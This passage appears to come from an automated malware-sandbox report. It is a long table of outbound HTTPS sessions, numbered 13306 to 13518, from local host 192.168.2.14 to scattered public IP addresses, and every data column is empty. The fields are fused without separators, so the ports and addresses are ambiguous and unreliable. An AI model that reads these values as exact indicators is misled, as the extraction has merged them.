                                                        13306192.168.2.1438516207.25.40.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13307192.168.2.145583438.80.140.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13308192.168.2.1450472191.222.248.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13309192.168.2.1435066103.119.69.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13310192.168.2.1454566156.192.191.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13311192.168.2.145813646.88.186.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13312192.168.2.144882242.38.141.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13313192.168.2.144391457.125.9.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13314192.168.2.144851271.149.186.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13315192.168.2.1441244154.241.80.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13316192.168.2.1434048221.183.95.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13317192.168.2.145751438.50.53.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13318192.168.2.1452368166.217.123.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13319192.168.2.1453880117.193.141.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13320192.168.2.1450462119.15.250.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13321192.168.2.1456636149.26.87.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13322192.168.2.145266073.121.15.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13323192.168.2.144194689.122.156.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13324192.168.2.144582039.112.87.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13325192.168.2.143749050.20.27.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13326192.168.2.1457904189.186.148.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13327192.168.2.145040035.84.67.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13328192.168.2.144360465.18.17.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13329192.168.2.1450156116.26.66.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13330192.168.2.14470461.197.198.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13331192.168.2.14512142.142.78.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13332192.168.2.1449254141.47.220.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13333192.168.2.1456458198.14.216.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13334192.168.2.145209883.67.173.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13335192.168.2.1433344137.240.39.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13336192.168.2.144906684.165.125.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13337192.168.2.145313483.109.154.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13338192.168.2.1447220139.119.20.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13339192.168.2.144155250.204.198.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13340192.168.2.144689661.133.108.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13341192.168.2.144574686.242.103.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13342192.168.2.144215439.208.197.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13343192.168.2.1449524152.46.10.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13344192.168.2.144549819.137.28.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13345192.168.2.143618699.15.14.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13346192.168.2.1453828211.97.194.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13347192.168.2.143541663.54.253.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13348192.168.2.145722073.116.232.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13349192.168.2.144223468.69.21.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13350192.168.2.144865460.7.156.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13351192.168.2.1454022206.1.96.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13352192.168.2.1440692188.87.134.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13353192.168.2.145588413.68.162.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13354192.168.2.1443428212.70.160.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13355192.168.2.144310058.164.79.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13356192.168.2.1433340105.252.25.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13357192.168.2.1450706194.98.155.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13358192.168.2.146072496.73.205.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13359192.168.2.1459232217.36.55.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13360192.168.2.144191052.83.177.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13361192.168.2.146086453.168.111.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13362192.168.2.143822424.92.131.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13363192.168.2.144852473.220.68.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13364192.168.2.145045896.201.55.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13365192.168.2.1451312155.123.108.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13366192.168.2.1460978200.153.213.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13367192.168.2.145140827.7.202.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13368192.168.2.1453860211.225.48.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13369192.168.2.146099887.179.112.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13370192.168.2.1436930161.74.227.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13371192.168.2.1445304173.117.233.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13372192.168.2.143667637.123.21.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13373192.168.2.143468848.34.33.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13374192.168.2.1447302190.105.216.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13375192.168.2.1459740138.172.242.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13376192.168.2.143357060.163.27.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13377192.168.2.14498184.102.158.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13378192.168.2.144356476.75.233.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13379192.168.2.144191445.132.98.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13380192.168.2.145398684.42.173.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13381192.168.2.14384742.194.149.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13382192.168.2.145593847.150.247.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13383192.168.2.145550271.53.12.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13384192.168.2.1452128156.239.32.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13385192.168.2.1438844156.26.83.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13386192.168.2.1439694123.67.31.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13387192.168.2.1459928105.229.72.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13388192.168.2.1443496126.161.86.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13389192.168.2.1446700190.7.196.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13390192.168.2.143304486.93.186.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13391192.168.2.144093689.20.227.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13392192.168.2.1452212121.35.233.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13393192.168.2.1446400160.243.106.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13394192.168.2.144384065.196.253.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13395192.168.2.1451228160.18.205.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13396192.168.2.1451998105.182.46.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13397192.168.2.1442540109.236.53.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13398192.168.2.143852280.232.195.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13399192.168.2.143358024.76.56.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13400192.168.2.1444036104.43.136.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13401192.168.2.1453438164.129.234.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13402192.168.2.144401436.13.217.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13403192.168.2.146007267.16.162.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13404192.168.2.14336082.69.99.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13405192.168.2.144849890.146.176.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13406192.168.2.1448912102.155.50.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13407192.168.2.1440164147.35.207.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13408192.168.2.1449778143.21.235.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13409192.168.2.1457882155.91.234.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13410192.168.2.143633673.3.175.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13411192.168.2.1439990165.97.10.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13412192.168.2.1460422157.52.27.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13413192.168.2.1459944154.164.158.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13414192.168.2.145700286.137.221.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13415192.168.2.1445504200.216.90.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13416192.168.2.145831282.168.106.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13417192.168.2.1458340110.200.225.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13418192.168.2.1448958117.114.42.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13419192.168.2.1441718218.164.26.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13420192.168.2.1454974181.88.220.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13421192.168.2.145373461.167.247.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13422192.168.2.14368388.181.186.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13423192.168.2.1453166204.85.185.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13424192.168.2.1443724134.65.232.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13425192.168.2.1447812196.115.117.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13426192.168.2.1443302213.246.175.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13427192.168.2.1454224109.180.136.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13428192.168.2.144582849.17.76.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13429192.168.2.1433592180.160.130.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13430192.168.2.144355476.102.155.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13431192.168.2.146020876.227.242.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13432192.168.2.1437700206.202.25.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13433192.168.2.145886676.253.138.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13434192.168.2.1433762107.241.196.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13435192.168.2.1444012105.203.105.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13436192.168.2.1444428190.86.16.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13437192.168.2.1442594147.89.232.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13438192.168.2.1458310129.207.244.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13439192.168.2.146018079.235.140.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13440192.168.2.144282238.167.116.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13441192.168.2.1438308149.205.108.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13442192.168.2.145918638.46.66.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13443192.168.2.143781234.84.151.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13444192.168.2.1437804146.32.24.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13445192.168.2.143329490.99.181.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13446192.168.2.1455708218.18.79.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13447192.168.2.143924275.178.184.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13448192.168.2.1456868140.205.145.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13449192.168.2.145949474.216.52.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13450192.168.2.1448962136.38.5.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13451192.168.2.143565223.92.81.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13452192.168.2.1447648206.228.81.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13453192.168.2.1439020148.158.84.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13454192.168.2.143663495.174.249.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13455192.168.2.145574838.140.12.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13456192.168.2.1449956192.19.208.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13457192.168.2.144903684.41.19.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13458192.168.2.144910852.13.47.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13459192.168.2.1445282148.149.59.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13460192.168.2.1452594197.215.76.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13461192.168.2.1438156136.49.117.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13462192.168.2.1448210123.97.98.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13463192.168.2.143347492.173.96.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13464192.168.2.144080087.216.94.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13465192.168.2.1460488102.120.164.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13466192.168.2.1447974216.130.11.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13467192.168.2.14521705.16.123.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13468192.168.2.1447316128.144.43.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13469192.168.2.1458966202.172.195.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13470192.168.2.1438604171.134.181.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13471192.168.2.1450044132.32.155.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13472192.168.2.1435002150.34.17.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13473192.168.2.1441832100.182.117.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13474192.168.2.1448722101.83.28.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13475192.168.2.144232237.229.131.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13476192.168.2.1445532148.29.97.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13477192.168.2.145179476.37.90.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13478192.168.2.146073681.110.210.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13479192.168.2.1454992153.57.224.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13480192.168.2.1447824101.230.46.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13481192.168.2.1441352102.119.17.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13482192.168.2.1457852108.241.27.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13483192.168.2.1453494200.147.125.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13484192.168.2.144701832.167.38.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13485192.168.2.145963838.68.125.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13486192.168.2.144157278.51.79.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13487192.168.2.145278037.234.52.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13488192.168.2.143855813.189.238.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13489192.168.2.14534844.165.229.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13490192.168.2.1450038189.83.27.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13491192.168.2.1432858185.31.38.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13492192.168.2.1447716125.38.197.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13493192.168.2.1442340144.84.237.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13494192.168.2.14416405.60.29.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13495192.168.2.1441722133.251.151.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13496192.168.2.1458294148.82.120.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13497192.168.2.1444064154.23.170.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13498192.168.2.1440984146.186.16.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13499192.168.2.1447500113.226.23.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13500192.168.2.1439486199.45.218.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13501192.168.2.145631098.78.107.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13502192.168.2.143970274.71.249.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13503192.168.2.144910882.103.163.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13504192.168.2.1447372192.19.238.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13505192.168.2.143981075.205.226.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13506192.168.2.1439152111.63.8.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13507192.168.2.143776488.249.145.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13508192.168.2.1455520178.153.111.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13509192.168.2.143282068.212.183.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13510192.168.2.1456258133.240.111.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13511192.168.2.1434820157.182.163.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13512192.168.2.1449976222.231.84.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13513192.168.2.1448998153.109.84.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13514192.168.2.145981837.218.96.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13515192.168.2.14608665.221.40.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13516192.168.2.1442896182.230.37.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13517192.168.2.1440898163.204.150.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13518192.168.2.14590169.136.248.143443
                                                        TimestampBytes transferredDirectionData


